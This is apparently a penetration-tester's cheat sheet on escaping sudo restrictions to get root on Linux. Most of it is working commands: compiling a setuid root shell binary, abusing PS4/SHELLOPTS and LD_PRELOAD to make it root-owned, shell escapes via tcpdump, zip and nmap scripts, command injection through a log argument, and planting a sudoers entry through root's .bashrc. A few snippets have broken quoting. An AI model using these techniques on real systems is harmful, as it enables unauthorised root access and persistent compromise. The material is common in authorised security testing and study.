Escaping sudo

First check what your commands and environment limitations are with sudo -l Then check permissions on the files you are allowed to run and on the folders that contain them If you can modify file you already know what to do. If the folder is wide open remove and create a link from the file you can run to your code. If environment is inherited from the user, set PS4, LD_PRELOAD, PERL5OPT, PYTHONINSPECT etc.

echo -e "int main() { setgid(0); setuid(0); execl("/bin/sh","sh",0);}" | gcc -o egg -
setenv SHELLOPTS xtrace
setenv PS4 '$(chown 0:0 egg)'
sudo ./command
setenv PS4 '$(chmod +xs egg)'
sudo ./command
./egg

LD_PRELOAD

echo -e "int main() { setgid(0); setuid(0); execl("/bin/sh","sh",0);}" | gcc -o /tmp/egg -
echo -e "#include <unistd.h>\n#include <stdio.h>\n#include <sys/types.h>\n#include <stdlib.h>\nvoid _init(){ if (!geteuid()) { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); execl("/bin/sh","sh","-c","chown 0:0 /tmp/egg; /bin/chmod +xs /tmp/egg",NULL); }} | gcc -o preloader.o -fPIC -

gcc -shared -Wl,-soname,libno_ex.so.1 -o /tmp/libno_ex.so.1.0 preloader.o -nostartfiles
sudo LD_PRELOAD=/tmp/libno_ex.so.1.0 command

Otherwise look for running a custom script from the allowed command. Examples:

tcpdump

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z shell.sh -Z root

zip

zip -U in.zip -O out.zip  -T -TT '/bin/bash #'

nmap

echo "os.execute('/bin/sh')" > shell.lua
sudo /usr/bin/nmap --script shell.lua

Look for interactive commands and see if you can escape them (! to call shell from vi or less) or overwrite/change For example you can use --interactive option in the older nmap

Another option is to use file output to overwrite the file itself with the custom script. Backup first, run shell, cleanup after cp command /tmp/command.bak sudo command -log command “; /bin/bash; cat /tmp/command.bak > command”

Last option is to try use an option to write to a file. Softlink that file to the root .bashrc, add a command to get you root and wait for root to login "$(echo -e "\necho 'me ALL=(ALL) ALL' > /etc/sudoers.d/getroot ")

Tags: PrivEsc